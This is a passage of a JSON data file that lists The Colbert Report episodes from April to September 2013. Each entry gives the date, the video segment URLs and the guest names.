        "http://thecolbertreport.cc.com/videos/zi0nnq/danica-patrick",
        "http://thecolbertreport.cc.com/videos/zwp3mi/sign-off---goodnight"
      ],
      "guest": "Danica Patrick"
    },
    {
      "date": "2013-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/md1l1j/exclusive---better-know-a-district---pennsylvania-s-17th---matt-cartwright",
        "http://thecolbertreport.cc.com/videos/1waayt/colbert-s-book-club",
        "http://thecolbertreport.cc.com/videos/zfq57f/better-know-a-district---pennsylvania-s-17th---matt-cartwright",
        "http://thecolbertreport.cc.com/videos/ypl8dh/miranda-rights-for-boston-bomber",
        "http://thecolbertreport.cc.com/videos/9j0img/gene-robinson",
        "http://thecolbertreport.cc.com/videos/vqrjkz/sign-off---welcome-baby-matheson-"
      ],
      "guest": "Bishop Gene Robinson"
    },
    {
      "date": "2013-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lceacn/intro---4-29-13",
        "http://thecolbertreport.cc.com/videos/s55dpi/stephen-s-worst-sports-nightmare",
        "http://thecolbertreport.cc.com/videos/q8gaki/the-final-days-of-straight-america",
        "http://thecolbertreport.cc.com/videos/su6rj1/the-word---we-shall-undermine",
        "http://thecolbertreport.cc.com/videos/u2ew19/yelp-prison-reviews",
        "http://thecolbertreport.cc.com/videos/8ewxg4/iggy-pop"
      ],
      "guest": "Iggy &amp; the Stooges"
    },
    {
      "date": "2013-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9ab72e/intro---4-30-13",
        "http://thecolbertreport.cc.com/videos/6brvhc/forced-tank-spending",
        "http://thecolbertreport.cc.com/videos/yxooec/the-word---medical-leave",
        "http://thecolbertreport.cc.com/videos/4iphqy/thought-for-food---spreadable-sharia---buddy-cup",
        "http://thecolbertreport.cc.com/videos/z5q514/evan-spiegel---bobby-murphy",
        "http://thecolbertreport.cc.com/videos/i4mbhv/sign-off---snapchat"
      ],
      "guest": "Evan Spiegel &amp; Bobby Murphy"
    },
    {
      "date": "2013-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/82vhzw/over-the-counter-plan-b",
        "http://thecolbertreport.cc.com/videos/7a77hc/background-check-backlash",
        "http://thecolbertreport.cc.com/videos/rf6pzs/the-word---n-r-a--vana",
        "http://thecolbertreport.cc.com/videos/cm8gvz/macklemore---ryan-lewis",
        "http://thecolbertreport.cc.com/videos/sq79ll/sign-off----the-heist-"
      ],
      "guest": "Macklemore &amp; Ryan Lewis"
    },
    {
      "date": "2013-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tqo262/intro---5-2-13",
        "http://thecolbertreport.cc.com/videos/7emy7s/boston-bomber-accomplices",
        "http://thecolbertreport.cc.com/videos/2k1660/gitmo-hunger-strike",
        "http://thecolbertreport.cc.com/videos/is0h3a/gitmo-hunger-strike---charles-swift",
        "http://thecolbertreport.cc.com/videos/nhiiwp/movies-that-are-destroying-america---summer-movie-edition----man-of-steel-----iron-man-3-",
        "http://thecolbertreport.cc.com/videos/mqwnf6/ben-kingsley",
        "http://thecolbertreport.cc.com/videos/t46my4/sign-off---montclair-film-festival"
      ],
      "guest": "Ben Kingsley"
    },
    {
      "date": "2013-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1mqcyb/intro---5-6-13",
        "http://thecolbertreport.cc.com/videos/tnugl6/colbert-s-book-club----the-great-gatsby-",
        "http://thecolbertreport.cc.com/videos/rxk0vp/stephen-colbert-s-bats--t-serious---bullet-conspiracy-theory",
        "http://thecolbertreport.cc.com/videos/ltsnqq/tip-wag---catholic-diocese-of-brooklyn---stoner-dogs",
        "http://thecolbertreport.cc.com/videos/wm2xsq/robert-caro",
        "http://thecolbertreport.cc.com/videos/479h8q/sign-off---south-carolina-special-election"
      ],
      "guest": "Robert Caro"
    },
    {
      "date": "2013-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bpnvtc/breaking-news---benghazi-whistleblowers",
        "http://thecolbertreport.cc.com/videos/wwbl80/better-know-a-district---maryland-s-4th---donna-edwards",
        "http://thecolbertreport.cc.com/videos/p3cofn/promposals",
        "http://thecolbertreport.cc.com/videos/eyzxx1/douglas-rushkoff",
        "http://thecolbertreport.cc.com/videos/ampziq/sign-off---goodnight"
      ],
      "guest": "Douglas Rushkoff"
    },
    {
      "date": "2013-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mpvlti/intro---5-8-13",
        "http://thecolbertreport.cc.com/videos/fyx23e/south-carolina-election-results",
        "http://thecolbertreport.cc.com/videos/m0huaq/spiteful-partisanship",
        "http://thecolbertreport.cc.com/videos/gbxmpo/going-diaperless",
        "http://thecolbertreport.cc.com/videos/xg0uqu/richard-besser",
        "http://thecolbertreport.cc.com/videos/in85s8/sign-off---helium-voice"
      ],
      "guest": "Dr. Richard Besser"
    },
    {
      "date": "2013-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t96yfm/colbert-s-book-club----the-great-gatsby-",
        "http://thecolbertreport.cc.com/videos/1i7t2j/colbert-s-book-club---learning--the-great-gatsby-",
        "http://thecolbertreport.cc.com/videos/4apw9e/colbert-s-book-club---jennifer-egan----the-great-gatsby-",
        "http://thecolbertreport.cc.com/videos/tetoi9/baz-luhrmann",
        "http://thecolbertreport.cc.com/videos/uuyuly/sign-off----the-great-gatsby-"
      ],
      "guest": "Jennifer Egan, Baz Luhrmann"
    },
    {
      "date": "2013-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hdvhlq/benghazi-attacks-talking-points",
        "http://thecolbertreport.cc.com/videos/gxwgja/colbert-super-pac-shh----irs-special-scrutiny",
        "http://thecolbertreport.cc.com/videos/jgqf2m/threatdown---planet-gay--world-wide-wood---junkie-bears",
        "http://thecolbertreport.cc.com/videos/l06a4l/jessica-buchanan---erik-landemalm",
        "http://thecolbertreport.cc.com/videos/ny9pcg/sign-off---goodnight"
      ],
      "guest": "Jessica Buchanan &amp; Erik Landemalm"
    },
    {
      "date": "2013-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g6ij84/intro---5-14-13",
        "http://thecolbertreport.cc.com/videos/1nghxb/obamacare-repeal-vote",
        "http://thecolbertreport.cc.com/videos/0jjvya/heritage-foundation-s-immigration-study",
        "http://thecolbertreport.cc.com/videos/h5zenk/who-s-not-honoring-me-now----maxim",
        "http://thecolbertreport.cc.com/videos/tq7jny/dan-brown",
        "http://thecolbertreport.cc.com/videos/ftry54/sign-off---maxim-s-hot-100"
      ],
      "guest": "Dan Brown"
    },
    {
      "date": "2013-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c91oeg/bug-protein",
        "http://thecolbertreport.cc.com/videos/qxjgw6/better-know-a-district---wisconsin-s-4th---gwen-moore-pt--1",
        "http://thecolbertreport.cc.com/videos/ft1gyx/better-know-a-district---wisconsin-s-4th---gwen-moore-pt--2",
        "http://thecolbertreport.cc.com/videos/xjltw5/cyndi-lauper",
        "http://thecolbertreport.cc.com/videos/f06og4/sign-off---kinky-boots"
      ],
      "guest": "Cyndi Lauper"
    },
    {
      "date": "2013-05-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ru2qad/intro---5-16-13",
        "http://thecolbertreport.cc.com/videos/vshddv/asparagusgate",
        "http://thecolbertreport.cc.com/videos/x9725b/tip-wag---wind-turbines---china",
        "http://thecolbertreport.cc.com/videos/6685w4/3d-printed-guns",
        "http://thecolbertreport.cc.com/videos/7xqphc/daniel-lieberman",
        "http://thecolbertreport.cc.com/videos/yktive/sign-off---barefoot-shoes"
      ],
      "guest": "Dr. Daniel Lieberman"
    },
    {
      "date": "2013-05-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iqqmsb/mazda-scandal-booth---benghazi",
        "http://thecolbertreport.cc.com/videos/xwopvb/mazda-scandal-booth---the-irs",
        "http://thecolbertreport.cc.com/videos/5qyy0w/mazda-scandal-booth---the-irs---trevor-potter",
        "http://thecolbertreport.cc.com/videos/irj43w/david-sassoon",
        "http://thecolbertreport.cc.com/videos/m9mkd8/sign-off---mazda-scandal-booth"
      ],
      "guest": "David Sassoon"
    },
    {
      "date": "2013-05-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wp98kg/intro---5-21-13",
        "http://thecolbertreport.cc.com/videos/7fm2v2/irish-potato-famine-pathogen",
        "http://thecolbertreport.cc.com/videos/pbfcaq/cheating-death---sun-exposure---marijuana",
        "http://thecolbertreport.cc.com/videos/3jp6f3/census-bureau-harassment",
        "http://thecolbertreport.cc.com/videos/cqajs7/noah-feldman",
        "http://thecolbertreport.cc.com/videos/2jhy5w/sign-off---goodnight"
      ],
      "guest": "Noah Feldman"
    },
    {
      "date": "2013-05-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c02847/intro---5-22-13",
        "http://thecolbertreport.cc.com/videos/24adff/irs-tea-party-scandal",
        "http://thecolbertreport.cc.com/videos/icnp2y/tip-wag---senators-mitch-and-chong---resourceful-rich-folk",
        "http://thecolbertreport.cc.com/videos/60entl/-citizen-koch-",
        "http://thecolbertreport.cc.com/videos/15h43y/matt-berninger"
      ],
      "guest": "The National"
    },
    {
      "date": "2013-05-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2j741e/aumf-repeal",
        "http://thecolbertreport.cc.com/videos/khhujw/aumf-repeal---andrew-bacevich",
        "http://thecolbertreport.cc.com/videos/0bv6m0/redemption-for-all",
        "http://thecolbertreport.cc.com/videos/ur1l6x/c-j--chivers",
        "http://thecolbertreport.cc.com/videos/ahpe36/sign-off---goodnight"
      ],
      "guest": "C.J. Chivers"
    },
    {
      "date": "2013-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ex0o10/stephen-s-week-off",
        "http://thecolbertreport.cc.com/videos/ervy41/better-know-a-district---wisconsin-s-2nd---mark-pocan",
        "http://thecolbertreport.cc.com/videos/s86l5y/trackingpoint-rifle",
        "http://thecolbertreport.cc.com/videos/4fwbkt/john-dingell",
        "http://thecolbertreport.cc.com/videos/yrhc20/sign-off---goodnight"
      ],
      "guest": "Rep. John Dingell"
    },
    {
      "date": "2013-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fivedj/michele-bachmann-s-last-term",
        "http://thecolbertreport.cc.com/videos/x7wc5a/tip-wag---google-glass---the-lone-ranger----3d-printed-food",
        "http://thecolbertreport.cc.com/videos/u1fvmr/irs-political-targeting---line-dancing-scandals",
        "http://thecolbertreport.cc.com/videos/tz8gve/alex-gibney",
        "http://thecolbertreport.cc.com/videos/fbuavt/sign-off---goodnight"
      ],
      "guest": "Alex Gibney"
    },
    {
      "date": "2013-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2ntvt9/intro---6-5-13",
        "http://thecolbertreport.cc.com/videos/eogja8/commando-of-steel",
        "http://thecolbertreport.cc.com/videos/fva65v/monsanto-s-modified-wheat",
        "http://thecolbertreport.cc.com/videos/ibdfsk/monsanto-s-modified-wheat---laurie-garrett",
        "http://thecolbertreport.cc.com/videos/bqahez/photojournalists-vs--iphones",
        "http://thecolbertreport.cc.com/videos/wqd06c/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/el0t4o/sign-off---amber-waves-of-frankengrain"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2013-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/onw7lq/nsa-phone-surveillance",
        "http://thecolbertreport.cc.com/videos/hbmw2f/colbert-classic---spy-training-with-peter-earnest",
        "http://thecolbertreport.cc.com/videos/zhz7uc/john-mellencamp--stephen-king---t-bone-burnett---pt--1",
        "http://thecolbertreport.cc.com/videos/lcf7d3/john-mellencamp--stephen-king---t-bone-burnett---pt--2",
        "http://thecolbertreport.cc.com/videos/46x6yt/sign-off---nose-tap"
      ],
      "guest": "Stephen King, John Mellencamp, T Bone Burnett"
    },
    {
      "date": "2013-06-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oc2w3x/edward-snowden-s-nsa-leaks",
        "http://thecolbertreport.cc.com/videos/bkbpaj/the-imploding-muslim-country-of-the-week---turkey",
        "http://thecolbertreport.cc.com/videos/rnftw3/the-imploding-muslim-country-of-the-week---turkey---omer-taspinar",
        "http://thecolbertreport.cc.com/videos/147u1d/cold-war-update---nuclear-launch-careers",
        "http://thecolbertreport.cc.com/videos/vii2l9/dan-savage",
        "http://thecolbertreport.cc.com/videos/kmqz9h/sign-off---the-imploding-muslim-country-of-the-week-booth"
      ],
      "guest": "Dan Savage"
    },
    {
      "date": "2013-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ctjh9s/intro---6-11-13",
        "http://thecolbertreport.cc.com/videos/1mm086/prism-surveillance-program",
        "http://thecolbertreport.cc.com/videos/jejy0d/prism-surveillance-program---jeffrey-rosen",
        "http://thecolbertreport.cc.com/videos/sa86i9/chewbacca-s-tsa-encounter",
        "http://thecolbertreport.cc.com/videos/s2d0lp/daniel-bergner",
        "http://thecolbertreport.cc.com/videos/x7nfzj/sign-off---goodnight"
      ],
      "guest": "Daniel Bergner"
    },
    {
      "date": "2013-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jdqve3/stephen-colbert-s-tribute-to-having-paul-mccartney-on-his-show",
        "http://thecolbertreport.cc.com/videos/eweibb/nsa-scandal-developments",
        "http://thecolbertreport.cc.com/videos/9i45f0/paul-mccartney",
        "http://thecolbertreport.cc.com/videos/2ildb8/nyc-bike-share"
      ],
      "guest": "Paul McCartney"
    },
    {
      "date": "2013-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yxgnju/remembering-lorna-colbert",
        "http://thecolbertreport.cc.com/videos/jm7bya/cap-n-crunch-scandal",
        "http://thecolbertreport.cc.com/videos/rtfkei/tip-wag---wall-street---north-carolina",
        "http://thecolbertreport.cc.com/videos/vztqfg/the-postal-service",
        "http://thecolbertreport.cc.com/videos/7vr4pz/sign-off---stage-fall"
      ],
      "guest": "The Postal Service"
    },
    {
      "date": "2013-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/616g0e/intro---6-20-13",
        "http://thecolbertreport.cc.com/videos/v8ee5f/iran-s-presidential-election",
        "http://thecolbertreport.cc.com/videos/k3dodo/steve-king-on-chicken-cages",
        "http://thecolbertreport.cc.com/videos/7udg5z/nestle-s-natural-resource",
        "http://thecolbertreport.cc.com/videos/0mw5zk/joss-whedon",
        "http://thecolbertreport.cc.com/videos/ooshhr/sign-off---paper-towel-tube-cage"
      ],
      "guest": "Joss Whedon"
    },
    {
      "date": "2013-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6gyv8z/the-irs---darrell-issa-s-gut",
        "http://thecolbertreport.cc.com/videos/oztyjs/the-word---truthinews",
        "http://thecolbertreport.cc.com/videos/93t9s1/tiny-triumphs---laser-klan",
        "http://thecolbertreport.cc.com/videos/dzzcx7/andrew-solomon",
        "http://thecolbertreport.cc.com/videos/h7v6sr/sign-off---goodnight"
      ],
      "guest": "Andrew Solomon"
    },
    {
      "date": "2013-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g5p8y4/intro---6-25-13",
        "http://thecolbertreport.cc.com/videos/348hon/scotus-on-the-voting-rights-act",
        "http://thecolbertreport.cc.com/videos/ysuxww/brazil-s-political-protests",
        "http://thecolbertreport.cc.com/videos/3gv8et/brazil-s-political-protests---larry-rohter",
        "http://thecolbertreport.cc.com/videos/mnxaxk/george-zimmerman-s-murder-trial",
        "http://thecolbertreport.cc.com/videos/ip1pn0/peniel-joseph",
        "http://thecolbertreport.cc.com/videos/b4zgvh/sign-off---goodnight"
      ],
      "guest": "Peniel Joseph"
    },
    {
      "date": "2013-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m2xuu4/intro---6-26-13",
        "http://thecolbertreport.cc.com/videos/nzd784/the-supreme-court-rules-on-doma",
        "http://thecolbertreport.cc.com/videos/um981i/the-end-of-the-voting-rights-act",
        "http://thecolbertreport.cc.com/videos/btpztg/the-voting-rights-act---gay-marriage---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/3ca2a0/bill-moyers",
        "http://thecolbertreport.cc.com/videos/09w1k9/sign-off---goodnight"
      ],
      "guest": "Bill Moyers"
    },
    {
      "date": "2013-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9lyyd3/4th-of-july-under-attack",
        "http://thecolbertreport.cc.com/videos/3wbx1d/stephen-colbert-s-big-gay-roundup",
        "http://thecolbertreport.cc.com/videos/ncxmfs/-gang-of-eight--immigration-reform-bill",
        "http://thecolbertreport.cc.com/videos/0gj3ie/chuck-schumer",
        "http://thecolbertreport.cc.com/videos/6kec7y/sign-off---goodnight"
      ],
      "guest": "Sen. Chuck Schumer"
    },
    {
      "date": "2013-07-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6jl3zv/stephen-s-vacation",
        "http://thecolbertreport.cc.com/videos/0gzuno/george-zimmerman-verdict",
        "http://thecolbertreport.cc.com/videos/9nhthn/people-who-are-destroying-america---lynn-harrell",
        "http://thecolbertreport.cc.com/videos/6dlnrd/ktvu-tv-on-asiana-airlines-crash",
        "http://thecolbertreport.cc.com/videos/vwtsg0/jeremy-scahill",
        "http://thecolbertreport.cc.com/videos/88fai0/sign-off---goodnight"
      ],
      "guest": "Jeremy Scahill"
    },
    {
      "date": "2013-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2ymeh3/intro---7-16-13",
        "http://thecolbertreport.cc.com/videos/rr5gb5/royal-baby-bump",
        "http://thecolbertreport.cc.com/videos/dd82ys/tip-wag---non-rioting-black-people---fox-news",
        "http://thecolbertreport.cc.com/videos/e8110o/npr-on-multitasking",
        "http://thecolbertreport.cc.com/videos/e5obyh/david-karp",
        "http://thecolbertreport.cc.com/videos/0mvlz8/sign-off---macbox"
      ],
      "guest": "David Karp"
    },
    {
      "date": "2013-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/84x6wp/rolling-stone-s-boston-bomber-cover",
        "http://thecolbertreport.cc.com/videos/eiwwmp/dysfunctional-house-republicans---immigration-reform",
        "http://thecolbertreport.cc.com/videos/dii80x/food-stamp-funding",
        "http://thecolbertreport.cc.com/videos/279goq/jerry-seinfeld-pt--1",
        "http://thecolbertreport.cc.com/videos/pw17w7/jerry-seinfeld-pt--2",
        "http://thecolbertreport.cc.com/videos/qfpfy4/sign-off---paper-fan"
      ],
      "guest": "Jerry Seinfeld"
    },
    {
      "date": "2013-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r4piw8/edward-snowden-s-asylum-option",
        "http://thecolbertreport.cc.com/videos/2m27vd/political-sex-scandals---new-york-city-elections",
        "http://thecolbertreport.cc.com/videos/dpebt7/political-sex-scandals---new-york-city-elections---eliot-spitzer",
        "http://thecolbertreport.cc.com/videos/m8rn8j/breaking-news-on-college-sex",
        "http://thecolbertreport.cc.com/videos/y56hes/jeff-bridges",
        "http://thecolbertreport.cc.com/videos/fiop8t/sign-off----operation-javelin-"
      ],
      "guest": "Jeff Bridges"
    },
    {
      "date": "2013-07-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/20zlbx/britain-s-royal-baby",
        "http://thecolbertreport.cc.com/videos/d0bn33/geraldo-rivera-s-tribute-to-helen-thomas",
        "http://thecolbertreport.cc.com/videos/8fg72p/minimum-wage---mcdonald-s-spending-journal",
        "http://thecolbertreport.cc.com/videos/0p9n45/neil-degrasse-tyson-s-alien-theory",
        "http://thecolbertreport.cc.com/videos/3azmuc/kjerstin-gruys",
        "http://thecolbertreport.cc.com/videos/mritg0/sign-off---linguini-worm"
      ],
      "guest": "Kjerstin Gruys"
    },
    {
      "date": "2013-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y6fmk6/royal-afterbirth--013-",
        "http://thecolbertreport.cc.com/videos/adczam/george-zimmerman---racial-tensions",
        "http://thecolbertreport.cc.com/videos/3vijkd/the-word---color-bind",
        "http://thecolbertreport.cc.com/videos/vbghld/domino-s-pizza-drone",
        "http://thecolbertreport.cc.com/videos/5tqazj/kenneth-goldsmith",
        "http://thecolbertreport.cc.com/videos/fvgc0u/sign-off---goodnight"
      ],
      "guest": "Kenneth Goldsmith"
    },
    {
      "date": "2013-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/508jwm/royal-baby-fever",
        "http://thecolbertreport.cc.com/videos/eodctw/anthony-weiner-s-penis",
        "http://thecolbertreport.cc.com/videos/4sgopv/carlos-danger--secret-mayor",
        "http://thecolbertreport.cc.com/videos/bf89i9/kanye-west-s-clothing-line",
        "http://thecolbertreport.cc.com/videos/zwqhae/anant-agarwal",
        "http://thecolbertreport.cc.com/videos/gbago4/sign-off---goodnight"
      ],
      "guest": "Anant Agarwal"
    },
    {
      "date": "2013-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l1dtzt/london-s-fake-town-crier",
        "http://thecolbertreport.cc.com/videos/lyjdmu/detroit-s-bankruptcy",
        "http://thecolbertreport.cc.com/videos/h9c7gh/detroit-s-bankruptcy---stephen-henderson",
        "http://thecolbertreport.cc.com/videos/8chokd/steve-king-s-immigrant-analogy",
        "http://thecolbertreport.cc.com/videos/263vwc/olympia-snowe",
        "http://thecolbertreport.cc.com/videos/kx84kd/sign-off---hand-bell"
      ],
      "guest": "Olympia Snowe"
    },
    {
      "date": "2013-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uw17hh/intro---7-29-13",
        "http://thecolbertreport.cc.com/videos/n0w3zw/obamacare-cards",
        "http://thecolbertreport.cc.com/videos/pna3x8/tip-wag---steve-stockman--david-cameron---north-carolina-legislature",
        "http://thecolbertreport.cc.com/videos/2i98l3/the-lumineers",
        "http://thecolbertreport.cc.com/videos/1i7dzf/sign-off---tambourine"
      ],
      "guest": "The Lumineers"
    },
    {
      "date": "2013-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/trrcbd/intro---7-30-13",
        "http://thecolbertreport.cc.com/videos/mulhwo/smokin--pole---the-quest-for-arctic-riches--north-pole-lake",
        "http://thecolbertreport.cc.com/videos/gr77sg/senator-gridlock",
        "http://thecolbertreport.cc.com/videos/hrha3p/the-word---secrets---laws",
        "http://thecolbertreport.cc.com/videos/jah6al/ted-cruz-s-humble-portrait",
        "http://thecolbertreport.cc.com/videos/bhod50/atul-gawande",
        "http://thecolbertreport.cc.com/videos/c1f9z7/sign-off---sleigh-bells"
      ],
      "guest": "Atul Gawande"
    },
    {
      "date": "2013-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4dtx20/intro---7-31-13",
        "http://thecolbertreport.cc.com/videos/6p4joy/bradley-manning-verdict",
        "http://thecolbertreport.cc.com/videos/hcbpix/lunch-or-campaign-2016-",
        "http://thecolbertreport.cc.com/videos/21zxm1/chris-christie-vs--rand-paul",
        "http://thecolbertreport.cc.com/videos/zyu4c8/stephen-colbert-s-super-coin-toss",
        "http://thecolbertreport.cc.com/videos/ngxjwr/emily-matchar",
        "http://thecolbertreport.cc.com/videos/f1q01l/sign-off---game-over"
      ],
      "guest": "Emily Matchar"
    },
    {
      "date": "2013-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s9hzk7/intro---8-1-13",
        "http://thecolbertreport.cc.com/videos/09hbf0/edward-snowden-s-asylum",
        "http://thecolbertreport.cc.com/videos/o0rsdt/oppressed-white-male-alert---bob-filner",
        "http://thecolbertreport.cc.com/videos/y8ilbl/grab-ask-5800",
        "http://thecolbertreport.cc.com/videos/opj4x1/threatdown---global-erotic-extremism--mini-muslims---stripper-bears",
        "http://thecolbertreport.cc.com/videos/gyog46/bryan-cranston",
        "http://thecolbertreport.cc.com/videos/qv7up3/sign-off---goodnight"
      ],
      "guest": "Bryan Cranston"
    },
    {
      "date": "2013-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n525ux/global-terror-warning",
        "http://thecolbertreport.cc.com/videos/1y9s5s/sport-report---a-rod-s-drug-scandal---combat-juggling",
        "http://thecolbertreport.cc.com/videos/91y2gj/hugh-laurie",
        "http://thecolbertreport.cc.com/videos/g0yu17/broadcast-networks-want-more-indecency",
        "http://thecolbertreport.cc.com/videos/n9o8qy/sign-off---glossary-of-terms"
      ],
      "guest": "Hugh Laurie"
    },
    {
      "date": "2013-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4ybtps/stephest-colbchella--013---the-song-of-the-summer-of-the-century",
        "http://thecolbertreport.cc.com/videos/s9j4ux/stephest-colbchella--013---special-guest-stephen-colbert-"
      ],
      "guest": "Robin Thicke"
    },
    {
      "date": "2013-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0t0r8t/stephest-colbchella--013---disco-decepticons",
        "http://thecolbertreport.cc.com/videos/je51p5/rich-white-guys-agreeing-with-each-other-alert---neil-cavuto",
        "http://thecolbertreport.cc.com/videos/m9o287/fast-food-workers-strike---mary-kay-henry",
        "http://thecolbertreport.cc.com/videos/b0jyca/sec-vs--fabulous-fab",
        "http://thecolbertreport.cc.com/videos/rrfnhj/ashton-kutcher",
        "http://thecolbertreport.cc.com/videos/iqw6df/sign-off---goodnight"
      ],
      "guest": "Ashton Kutcher"
    },
    {
      "date": "2013-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ehgkke/ganjay-supta",
        "http://thecolbertreport.cc.com/videos/x55kjy/hollywood-heroes",
        "http://thecolbertreport.cc.com/videos/lual8r/hollywood-heroes---matt-damon",
        "http://thecolbertreport.cc.com/videos/qqmmcz/the-ronald-wilson-reagan-economic-breathing-zone",
        "http://thecolbertreport.cc.com/videos/6duz1s/colum-mccann",
        "http://thecolbertreport.cc.com/videos/fama3f/sign-off----fifty-shades-of-grey-"
      ],
      "guest": "Colum McCann"
    },
    {
      "date": "2013-08-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m7rv7i/badonkadonk-journalism",
        "http://thecolbertreport.cc.com/videos/qokabz/better-know-a-district---new-jersey-s-12th",
        "http://thecolbertreport.cc.com/videos/vni3w0/better-know-a-district---new-jersey-s-12th---rush-holt",
        "http://thecolbertreport.cc.com/videos/swss3n/innocent-tourist-mistake",
        "http://thecolbertreport.cc.com/videos/lixrq0/sheldon-whitehouse",
        "http://thecolbertreport.cc.com/videos/ck9vu0/sign-off---goodnight"
      ],
      "guest": "Sen. Sheldon Whitehouse"
    },
    {
      "date": "2013-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jtshn3/stop-and-frisk---mandatory-minimums",
        "http://thecolbertreport.cc.com/videos/o5aiwi/tsa-expansion-program",
        "http://thecolbertreport.cc.com/videos/miwb3z/tsa-expansion-program---steven-pinker",
        "http://thecolbertreport.cc.com/videos/pd148a/john-lewis-pt--1",
        "http://thecolbertreport.cc.com/videos/ocqoae/john-lewis-pt--2",
        "http://thecolbertreport.cc.com/videos/z6ytj0/sign-off----the-better-angels-of-our-nature-"
      ],
      "guest": "Rep. John Lewis"
    },
    {
      "date": "2013-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/als8jg/intro---8-14-13",
        "http://thecolbertreport.cc.com/videos/wjgfbx/sochi-2014-winter-olympics",
        "http://thecolbertreport.cc.com/videos/y58ew9/people-who-are-destroying-america---johnny-cummings",
        "http://thecolbertreport.cc.com/videos/oafmw7/big-mother-government",
        "http://thecolbertreport.cc.com/videos/wc12me/kevin-spacey",
        "http://thecolbertreport.cc.com/videos/o1qztj/sign-off---goodnight"
      ],
      "guest": "Kevin Spacey"
    },
    {
      "date": "2013-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fwx35y/obama-rodeo-clown",
        "http://thecolbertreport.cc.com/videos/0bdl0z/golden-age-of-flammability",
        "http://thecolbertreport.cc.com/videos/r9ju4t/the-word---gag-gift",
        "http://thecolbertreport.cc.com/videos/jngkv0/nsa-press-conference-on-domestic-spying",
        "http://thecolbertreport.cc.com/videos/8ax5jq/richard-brodhead",
        "http://thecolbertreport.cc.com/videos/42qo92/sign-off---second-installment-of-colbert-s-book-club"
      ],
      "guest": "Richard Brodhead"
    },
    {
      "date": "2013-09-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pkboc3/exclusive---better-know-a-district---michigan-s-5th---dan-kildee",
        "http://thecolbertreport.cc.com/videos/pnf1sx/intro---9-3-13",
        "http://thecolbertreport.cc.com/videos/tx5zzr/stephen-s-science-project---chemical-weapons-in-syria",
        "http://thecolbertreport.cc.com/videos/dhyi3l/better-know-a-district---michigan-s-5th---dan-kildee",
        "http://thecolbertreport.cc.com/videos/pwzlgj/timothy-dolan-pt--1",
        "http://thecolbertreport.cc.com/videos/m4p07o/timothy-dolan-pt--2",
        "http://thecolbertreport.cc.com/videos/xws5t1/sign-off---welcome-baby-rosta-"
      ],
      "guest": "Timothy Cardinal Dolan"
    },
    {
      "date": "2013-09-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4obytf/intro---9-4-13",
        "http://thecolbertreport.cc.com/videos/020ri3/cris-ish-in-syri-eh",
        "http://thecolbertreport.cc.com/videos/jtjmpo/cris-ish-in-syri-eh---steve-coll",
        "http://thecolbertreport.cc.com/videos/hrfvxe/perfect-polly",
        "http://thecolbertreport.cc.com/videos/q9zsg7/gary-england",
        "http://thecolbertreport.cc.com/videos/jnebqk/sign-off---goodnight"
      ],
      "guest": "Gary England"
    },
    {
      "date": "2013-09-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fzzhny/intro---9-5-13",
        "http://thecolbertreport.cc.com/videos/cgxdol/smile-file---ariel-castro---the-eric-bolling-sunshine-express",
        "http://thecolbertreport.cc.com/videos/cn86ce/kitten-subway-crisis---the-new-york-city-mayoral-race",
        "http://thecolbertreport.cc.com/videos/l0disu/colbert-s-book-club---the-couch-bunker",
        "http://thecolbertreport.cc.com/videos/ub6jy0/john-prine"
